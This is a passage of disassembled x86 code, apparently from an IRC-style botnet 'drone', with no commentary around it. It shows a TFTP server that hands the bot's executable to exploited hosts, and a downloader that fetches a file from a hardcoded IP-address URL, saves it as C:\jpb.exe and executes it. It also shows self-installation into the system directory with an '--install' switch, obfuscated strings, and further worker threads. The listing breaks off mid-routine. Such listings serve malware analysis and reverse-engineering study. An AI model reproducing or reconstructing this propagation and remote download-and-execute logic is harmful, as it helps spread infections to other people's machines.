loc_41B96B: ; CODE XREF: sub_41B7A3+E6j
; sub_41B7A3+16Dj
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B880
jmp short loc_41B9C4
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: sub_41B7A3+1BCj
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi ; inet_ntoa
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax
push [ebp+0CD8h+var_C18]
push offset dword_42851C
call sub_417B51
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B9C4: ; CODE XREF: sub_41B7A3+1D9j
push [ebp+0CD8h+var_D2C]
push 2
call sub_4029FC
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B866
sub_41B7A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9D6 proc near ; DATA XREF: sub_41BBD8+15Ao
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B9FC
loc_41B9F5: ; CODE XREF: sub_41B9D6+42j
; sub_41B9D6+5Dj ...
push ebx
call ds:off_41D10C
loc_41B9FC: ; CODE XREF: sub_41B9D6+1Dj
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D220 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B9F5
push offset aRb ; "rb"
push offset dword_428548
call sub_4035C0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_228], eax
jz short loc_41B9F5
push eax
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call sub_403EB3
test eax, eax
pop ecx
jnz loc_41BB44
mov esi, ds:dword_41D270
loc_41BA5A: ; CODE XREF: sub_41B9D6+168j
push 204h
lea eax, [ebp+var_224]
push ebx
push eax
call sub_407F20
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi ; htons
push 3
mov [ebp+var_222], ax
call esi ; htons
push [ebp+var_228]
mov [ebp+var_224], ax
push 200h
lea eax, [ebp+var_220]
push 1
push eax
call sub_40413F
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D248 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_41BBC0
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D258 ; recvfrom
cmp eax, 0FFFFFFFFh
jz loc_41BBC0
push [ebp+var_238]
call ds:dword_41D250 ; htons
cmp ax, 4
jnz loc_41BBC0
push [ebp+var_238+2]
call ds:dword_41D250 ; htons
cmp ax, word ptr [ebp+var_22C]
jnz loc_41BBC0
push [ebp+var_228]
call sub_403EB3
test eax, eax
pop ecx
jz loc_41BA5A
loc_41BB44: ; CODE XREF: sub_41B9D6+78j
inc dword_4354B4
push 100h
call sub_402A14
mov esi, eax
push esi
call sub_402E11
push eax
mov ebx, offset aTtzf ; "â⇔"
call sub_419F0A
add esp, 0Ch
push dword_4354B4
push [ebp+var_14]
call ds:dword_41D25C ; inet_ntoa
push eax
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi
push 0
push offset dword_42851C
call sub_417B51
push esi
call sub_402F67
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D280 ; closesocket
push [ebp+var_228]
call sub_403890
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402ADC
leave
retn 4
; ---------------------------------------------------------------------------
loc_41BBC0: ; CODE XREF: sub_41B9D6+100j
; sub_41B9D6+125j ...
push edi
call ds:dword_41D280 ; closesocket
push [ebp+var_228]
call sub_403890
pop ecx
jmp loc_41B9F5
sub_41B9D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBD8 proc near ; DATA XREF: sub_41BD7B+53o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D220 ; socket
cmp eax, 0FFFFFFFFh
mov dword_428544, eax
jnz short loc_41BC21
xor ebx, ebx
loc_41BC14: ; CODE XREF: sub_41BBD8+C1j
mov byte_4354AD, bl
loc_41BC1A: ; CODE XREF: sub_41BBD8+BFj
push ebx
call ds:off_41D10C
loc_41BC21: ; CODE XREF: sub_41BBD8+38j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D24C ; setsockopt
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D270 ; htons
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push dword_428544
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D27C ; bind
cmp eax, 0FFFFFFFFh
jnz loc_41BD4A
push dword_428544
call ds:dword_41D280 ; closesocket
cmp byte_4354AD, bl
jz short loc_41BC1A
jmp loc_41BC14
; ---------------------------------------------------------------------------
loc_41BC9E: ; CODE XREF: sub_41BBD8+178j
mov eax, dword_428544
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D254 ; select
test eax, eax
jle short loc_41BD4A
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push dword_428544
mov [esp+170h+var_13C], 10h
call ds:dword_41D258 ; recvfrom
cmp eax, 0FFFFFFFFh
jz short loc_41BD4A
push [esp+158h+var_134]
inc dword_4354B0
call ds:dword_41D250 ; htons
cmp ax, si
jnz short loc_41BD4A
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B9D6
push ebx
push ebx
call ds:off_41D090
push 3E8h
call ds:off_41D0F8
loc_41BD4A: ; CODE XREF: sub_41BBD8+A7j
; sub_41BBD8+FCj ...
cmp byte_4354AD, bl
jnz loc_41BC9E
push dword_428544
call ds:dword_41D280 ; closesocket
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402ADC
mov esp, ebp
pop ebp
retn 4
sub_41BBD8 endp
; =============== S U B R O U T I N E =======================================
sub_41BD7B proc near ; CODE XREF: sub_4022DF+5Ap
; sub_41C2E2+3CDp
push 4
mov eax, offset loc_41C984
call sub_40497C
xor ebx, ebx
cmp byte_4354AD, bl
jz short loc_41BD95
loc_41BD91: ; CODE XREF: sub_41BD7B+74j
mov al, 1
jmp short loc_41BDF9
; ---------------------------------------------------------------------------
loc_41BD95: ; CODE XREF: sub_41BD7B+14j
mov edi, 100h
push edi
push ebx
mov esi, offset dword_428548
push esi
call sub_407F20
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E0 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
push 8
call sub_403417
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41BDE1
push offset sub_41BBD8
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_414887
jmp short loc_41BDE3
; ---------------------------------------------------------------------------
loc_41BDE1: ; CODE XREF: sub_41BD7B+51j
xor eax, eax
loc_41BDE3: ; CODE XREF: sub_41BD7B+64j
cmp [eax+4], ebx
jz short loc_41BDF1
mov byte_4354AD, 1
jmp short loc_41BD91
; ---------------------------------------------------------------------------
loc_41BDF1: ; CODE XREF: sub_41BD7B+6Bj
mov byte_4354AD, bl
xor al, al
loc_41BDF9: ; CODE XREF: sub_41BD7B+18j
call sub_404A1B
retn
sub_41BD7B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BDFF proc near ; CODE XREF: sub_40177B+6Cp
; sub_4019F3+6Cp ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx
push eax
mov [esp+3F4h+var_208], bl
call sub_407F20
add esp, 0Ch
push 0FFh
lea eax, [esp+3ECh+var_307]
push ebx
push eax
mov [esp+3F4h+var_308], bl
call sub_407F20
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_414B90
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+var_208]
push offset aS_15 ; "%s"
push esi
push eax
call sub_402EBA
lea eax, [esp+3F8h+var_208]
add esp, 10h
lea esi, [eax+1]
loc_41BE8C: ; CODE XREF: sub_41BDFF+92j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE8C
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+var_208]
call sub_417450
push 200h
lea eax, [esp+3F4h+var_208]
push ebx
push eax
call sub_407F20
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_4172D0
pop ecx
push 0C0h
push 0
push edi
call sub_407F20
add esp, 0Ch
xor esi, esi
loc_41BEE1: ; CODE XREF: sub_41BDFF+114j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh
push edi
call sub_402EBA
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41BF03: ; CODE XREF: sub_41BDFF+109j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BF03
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41BEE1
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402ADC
mov esp, ebp
pop ebp
retn
sub_41BDFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF2B proc near ; DATA XREF: sub_40177B+234o
; sub_4019F3+1E6o ...
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = byte ptr -73Ch
var_738 = byte ptr -738h
var_638 = byte ptr -638h
var_615 = byte ptr -615h
var_515 = byte ptr -515h
var_415 = byte ptr -415h
var_414 = byte ptr -414h
var_413 = dword ptr -413h
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, dword_423064
xor eax, esp
mov [esp+754h+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov ecx, 0C9h
lea edi, [esp+760h+var_738]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D218 ; InternetOpenA
mov esi, eax
lea eax, [esp+760h+var_515]
push eax
lea eax, [esp+764h+var_615]
push eax
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+76Ch+var_738]
push eax
push [esp+770h+var_413]
mov edi, offset dword_42851C
push edi
call sub_417B51
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+770h+var_615]
push eax
push esi
call ds:dword_41D214 ; InternetOpenUrlA
cmp esi, ebx
mov [esp+760h+var_744], eax
jz loc_41C14A
cmp eax, ebx
jz loc_41C143
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+778h+var_515]
push eax
call ds:off_41D06C
mov [esp+760h+var_748], eax
call ds:dword_41D104 ; GetTickCount
mov [esp+760h+var_740], eax
mov [esp+760h+var_750], ebx
mov esi, 400h
loc_41BFF2: ; CODE XREF: sub_41BF2B+11Fj
push esi
lea eax, [esp+764h+var_408]
push ebx
push eax
call sub_407F20
add esp, 0Ch
lea eax, [esp+760h+var_74C]
push eax
push esi
lea eax, [esp+768h+var_408]
push eax
push [esp+76Ch+var_744]
call ds:dword_41D210 ; InternetReadFile
push ebx
lea eax, [esp+764h+var_73C]
push eax
push [esp+768h+var_74C]
lea eax, [esp+76Ch+var_408]
push eax
push [esp+770h+var_748]
call ds:off_41D088
test eax, eax
jz loc_41C0F5
mov eax, [esp+760h+var_74C]
add [esp+760h+var_750], eax
cmp eax, ebx
ja short loc_41BFF2
call ds:dword_41D104 ; GetTickCount
sub eax, [esp+760h+var_740]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41C068
xor ecx, ecx
inc ecx
loc_41C068: ; CODE XREF: sub_41BF2B+138j
mov eax, [esp+760h+var_750]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push [esp+768h+var_750]
lea eax, [esp+76Ch+var_515]
push eax
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+774h+var_738]
push eax
push [esp+778h+var_413]
push edi
call sub_417B51
add esp, 20h
push [esp+760h+var_748]
call ds:off_41D0D8
cmp [esp+760h+var_415], 1
jnz loc_41C164
cmp [esp+760h+var_414], bl
lea eax, [esp+760h+var_515]
jz short loc_41C103
push eax
call sub_419A4F
test al, al
pop ecx
lea eax, [esp+760h+var_738]
jz short loc_41C0FC
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax
push [esp+768h+var_413]
push edi
call sub_417B51
add esp, 10h
lea eax, [esp+760h+var_638]
push eax
call sub_419CB0
loc_41C0F5: ; CODE XREF: sub_41BF2B+10Fj
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41C14F
; ---------------------------------------------------------------------------
loc_41C0FC: ; CODE XREF: sub_41BF2B+1A5j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41C153
; ---------------------------------------------------------------------------
loc_41C103: ; CODE XREF: sub_41BF2B+196j
push 5
push ebx
push ebx
push eax
push offset byte_41EF1F
push ebx
call ds:dword_41D1E0
test eax, eax
jnz short loc_41C11F
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41C14F
; ---------------------------------------------------------------------------
loc_41C11F: ; CODE XREF: sub_41BF2B+1EBj
lea eax, [esp+760h+var_515]
push eax
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+768h+var_738]
push eax
push [esp+76Ch+var_413]
push edi
call sub_417B51
add esp, 14h
jmp short loc_41C164
; ---------------------------------------------------------------------------
loc_41C143: ; CODE XREF: sub_41BF2B+91j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41C14F
; ---------------------------------------------------------------------------
loc_41C14A: ; CODE XREF: sub_41BF2B+89j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41C14F: ; CODE XREF: sub_41BF2B+1CFj
; sub_41BF2B+1F2j ...
lea eax, [esp+764h+var_738]
loc_41C153: ; CODE XREF: sub_41BF2B+1D6j
push eax
push [esp+768h+var_413]
push edi
call sub_417B51
add esp, 10h
loc_41C164: ; CODE XREF: sub_41BF2B+182j
; sub_41BF2B+216j
call ds:dword_41D0DC ; GetCurrentThreadId
push eax
call sub_41481E
pop ecx
mov ecx, [esp+760h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402ADC
mov esp, ebp
pop ebp
retn 4
sub_41BF2B endp
; =============== S U B R O U T I N E =======================================
sub_41C18A proc near ; CODE XREF: sub_41C2E2+29Fp
push 334h
mov eax, offset loc_41CA0C
call sub_4049E5
push 327h
xor ebx, ebx
lea eax, [ebp-338h]
push ebx
push eax
call sub_407F20
lea eax, [ebp-338h]
add esp, 0Ch
lea edx, [eax+1]
loc_41C1B9: ; CODE XREF: sub_41C18A+34j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C1B9
sub eax, edx
mov [ebp+eax-338h], bl
lea eax, [ebp-238h]
lea esi, [eax+1]
loc_41C1D2: ; CODE XREF: sub_41C18A+4Dj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C1D2
sub eax, esi
push offset aHttp217_67_229 ; "http://217.67.229.212/phpbb/uploads/jpb"...
mov [ebp+eax-238h], bl
mov esi, 0FFh
lea eax, [ebp-215h]
push esi
push eax
call sub_402EBA
lea eax, [ebp-215h]
add esp, 0Ch
lea edi, [eax+1]
loc_41C205: ; CODE XREF: sub_41C18A+80j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C205
sub eax, edi
push offset aCJpb_exe ; "C:\\jpb.exe"
mov [ebp+eax-215h], bl
lea eax, [ebp-115h]
push esi
push eax
call sub_402EBA
lea eax, [ebp-115h]
add esp, 0Ch
lea esi, [eax+1]
loc_41C233: ; CODE XREF: sub_41C18A+AEj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C233
sub eax, esi
mov [ebp+eax-115h], bl
push 8
mov byte ptr [ebp-12h], 1
mov [ebp-13h], bl
mov byte ptr [ebp-15h], 1
mov [ebp-14h], bl
call sub_403417
mov esi, eax
pop ecx
mov [ebp-33Ch], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41C27D
push offset sub_41BF2B
lea ecx, [ebp-338h]
mov edi, offset aDl ; "DL"
call sub_414887
loc_41C27D: ; CODE XREF: sub_41C18A+DCj
call sub_404A2F
retn
sub_41C18A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C283 proc near ; CODE XREF: .text:0041CB70p
; .text:0041CB8Cp ...
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_104]
push 100h
push eax
mov dword ptr [esi], offset off_420B54
mov [ebp+var_108], esi
call sub_402EBA
mov eax, dword_4357B0
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_4357AC
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402ADC
leave
retn 4
sub_41C283 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2E2 proc near ; CODE XREF: sub_4044D2-6Ep
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = byte ptr -720h
var_718 = dword ptr -718h
var_714 = dword ptr -714h
var_680 = byte ptr -680h
var_4EC = byte ptr -4ECh
var_4E0 = byte ptr -4E0h
var_4DF = byte ptr -4DFh
var_4A8 = byte ptr -4A8h
var_4A7 = byte ptr -4A7h
var_428 = byte ptr -428h
var_427 = byte ptr -427h
var_320 = byte ptr -320h
var_31F = byte ptr -31Fh
var_218 = byte ptr -218h
var_217 = byte ptr -217h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 72Ch
mov eax, dword_423064
xor eax, esp
mov [esp+72Ch+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov [esp+738h+var_728], eax
call sub_419EB0
test al, al
jnz loc_41C764
call sub_419E25
test al, al
jnz short loc_41C322
call ds:off_41D08C
loc_41C322: ; CODE XREF: sub_41C2E2+38j
mov esi, offset aInstall ; "--install "
lea edi, [esp+738h+var_4EC]
movsd
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+73Ch+var_10F]
push ebx
push eax
mov [esp+744h+var_110], bl
call sub_407F20
add esp, 0Ch
push edi
lea eax, [esp+73Ch+var_31F]
push ebx
push eax
mov [esp+744h+var_320], bl
call sub_407F20
add esp, 0Ch
push edi
lea eax, [esp+73Ch+var_427]
push ebx
push eax
mov [esp+744h+var_428], bl
call sub_407F20
add esp, 0Ch
push 7Fh
lea eax, [esp+73Ch+var_4A7]
push ebx
push eax
mov [esp+744h+var_4A8], bl
call sub_407F20
add esp, 0Ch
push edi
lea eax, [esp+73Ch+var_110]
push eax
call ds:dword_41D0F0 ; GetSystemDirectoryA
push 80h
lea esi, [esp+73Ch+var_4A8]
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
call sub_419F0A
pop ecx
mov eax, esi
push eax
lea eax, [esp+73Ch+var_110]
push eax
push offset aSS_6 ; "%s\\%s"
lea eax, [esp+744h+var_428]
push edi
push eax
call sub_402EBA
lea eax, [esp+74Ch+var_428]
add esp, 14h
lea ecx, [eax+1]
loc_41C3F0: ; CODE XREF: sub_41C2E2+113j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41C3F0
sub eax, ecx
xor ebx, ebx
mov [esp+eax+738h+var_428], bl
mov esi, 104h
push esi
lea eax, [esp+73Ch+var_320]
push eax
push ebx
call ds:dword_41D0E0 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [esp+738h+var_4EC]
lea ecx, [eax+1]
loc_41C428: ; CODE XREF: sub_41C2E2+14Bj
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41C428
sub eax, ecx
push eax
lea eax, [esp+73Ch+var_4EC]
push eax
push [esp+740h+var_728]
call sub_402DB5
add esp, 0Ch
test eax, eax
jz short loc_41C4B0
push esi
lea eax, [esp+73Ch+var_428]
push eax
lea eax, [esp+740h+var_320]
push eax
call sub_402DB5
add esp, 0Ch
test eax, eax
jz short loc_41C4B0
push ebx
lea eax, [esp+73Ch+var_428]
push eax
lea eax, [esp+740h+var_320]
push eax
call ds:dword_41D080 ; CopyFileA
test eax, eax
jz loc_41C764
lea eax, [esp+738h+var_320]
push eax
lea eax, [esp+73Ch+var_4EC]
push eax
lea eax, [esp+740h+var_428]
push eax
push offset aSSS_0 ; "%s %s%s"
call sub_419A4F
add esp, 10h
jmp loc_41C764
; ---------------------------------------------------------------------------
loc_41C4B0: ; CODE XREF: sub_41C2E2+166j
; sub_41C2E2+183j
lea eax, [esp+738h+var_4EC]
lea edx, [eax+1]
loc_41C4BA: ; CODE XREF: sub_41C2E2+1DDj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C4BA
sub eax, edx
push eax
lea eax, [esp+73Ch+var_4EC]
push eax
push [esp+740h+var_728]
call sub_402DB5
add esp, 0Ch
test eax, eax
jnz loc_41C586
push esi
lea eax, [esp+73Ch+var_428]
push eax
lea eax, [esp+740h+var_320]
push eax
call sub_402DB5
add esp, 0Ch
test eax, eax
jnz loc_41C586
push edi
lea eax, [esp+73Ch+var_217]
push ebx
push eax
mov [esp+744h+var_218], bl
call sub_407F20
lea eax, [esp+744h+var_4EC]
add esp, 0Ch
lea edi, [eax+1]
loc_41C524: ; CODE XREF: sub_41C2E2+247j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41C524
mov ecx, [esp+738h+var_728]
sub eax, edi
add eax, ecx
push eax
push offset aS_11 ; "%s"
lea eax, [esp+740h+var_218]
push esi
push eax
call sub_402EBA
add esp, 10h
xor edi, edi
loc_41C54C: ; CODE XREF: sub_41C2E2+28Bj
lea eax, [esp+738h+var_218]
push eax
call ds:off_41D0CC
test eax, eax
jnz short loc_41C56F
push 0C8h
call ds:off_41D0F8
inc edi
cmp edi, 3
jb short loc_41C54C
loc_41C56F: ; CODE XREF: sub_41C2E2+27Aj
push esi
lea eax, [esp+73Ch+var_218]
push ebx
push eax
call sub_407F20
add esp, 0Ch
call sub_41C18A
loc_41C586: ; CODE XREF: sub_41C2E2+1F8j
; sub_41C2E2+219j
push 80h
lea eax, [esp+73Ch+var_4A8]
push ebx
push eax
call sub_407F20
add esp, 0Ch
push 37h
lea eax, [esp+73Ch+var_4DF]
push ebx
push eax
mov [esp+744h+var_4E0], bl
call sub_407F20
add esp, 0Ch
push 38h
lea esi, [esp+73Ch+var_4E0]
mov ebx, offset aVutttttttt ; "‚“’’’’’’’’"
call sub_419F0A
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:off_41D084
push 38h
mov esi, eax
lea eax, [esp+73Ch+var_4E0]
push ebx
push eax
call sub_407F20
add esp, 0Ch
push 1388h
push esi
call ds:off_41D07C
cmp eax, 102h
jnz short loc_41C607
push ebx
call ds:off_41D050
loc_41C607: ; CODE XREF: sub_41C2E2+31Cj
call sub_417776
push 8
call sub_403417
cmp eax, ebx
pop ecx
jz short loc_41C62B
push offset sub_417909
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_414887
loc_41C62B: ; CODE XREF: sub_41C2E2+334j
lea eax, [esp+738h+var_718]
push eax
mov [esp+73Ch+var_718], 94h
call ds:dword_41D068 ; GetVersionExA
cmp [esp+738h+var_714], 4
jz short loc_41C664
push 8
call sub_403417
cmp eax, ebx
pop ecx
jz short loc_41C664
push offset sub_41A6D9
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_414887
loc_41C664: ; CODE XREF: sub_41C2E2+361j
; sub_41C2E2+36Dj
push 8
mov byte_428520, bl
call sub_403417
cmp eax, ebx
pop ecx
jz short loc_41C689
push offset sub_418B2F
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_414887
loc_41C689: ; CODE XREF: sub_41C2E2+392j
lea eax, [esp+738h+var_680]
push eax
push 202h
call ds:dword_41D274 ; WSAStartup
test eax, eax
jnz loc_41C75E
call sub_419B31
mov byte_4354AD, bl
call sub_41BD7B
mov eax, [ebp+arg_0]
mov byte_428414, bl
mov dword_428204, eax
call sub_419545
mov eax, dword_4357B0
mov eax, [eax]
mov ebx, offset dword_4357AC
mov [esp+738h+var_724], eax
mov [esp+738h+var_728], ebx
loc_41C6DB: ; CODE XREF: sub_41C2E2+424j
cmp [esp+738h+var_728], 0
mov esi, dword_4357B0
jz short loc_41C6EE
cmp [esp+738h+var_728], ebx
jz short loc_41C6F3
loc_41C6EE: ; CODE XREF: sub_41C2E2+404j
call sub_403329
loc_41C6F3: ; CODE XREF: sub_41C2E2+40Aj
cmp [esp+738h+var_724], esi
jz short loc_41C708
lea edi, [esp+738h+var_720]
lea esi, [esp+738h+var_728]
call sub_40168C
jmp short loc_41C6DB
; ---------------------------------------------------------------------------
loc_41C708: ; CODE XREF: sub_41C2E2+415j
mov edi, offset dword_42851C
loc_41C70D: ; CODE XREF: sub_41C2E2+47Aj
push 3
mov esi, offset dword_425E30
pop ebx
loc_41C715: ; CODE XREF: sub_41C2E2+478j
movsx eax, word ptr [esi+200h]
push eax
push esi
lea edx, [esi-200h]
mov ecx, edi
call sub_418884
test al, al
jz short loc_41C741
mov byte_428520, 1
loc_41C736: ; CODE XREF: sub_41C2E2+45Dj
mov ecx, edi
call sub_4186F1
test al, al
jnz short loc_41C736
loc_41C741: ; CODE XREF: sub_41C2E2+44Bj
push 3A98h
mov byte_428520, 0
call ds:off_41D0F8
add esi, 402h
dec ebx
jnz short loc_41C715
jmp short loc_41C70D
; ---------------------------------------------------------------------------
loc_41C75E: ; CODE XREF: sub_41C2E2+3BCj
call ds:dword_41D240 ; WSACleanup
loc_41C764: ; CODE XREF: sub_41C2E2+2Bj
; sub_41C2E2+19Ej ...
mov ecx, [esp+738h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402ADC
mov esp, ebp
pop ebp
retn 10h
sub_41C2E2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C780 proc near ; CODE XREF: sub_4195CE+2Fp
; sub_4195CE+6Cp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
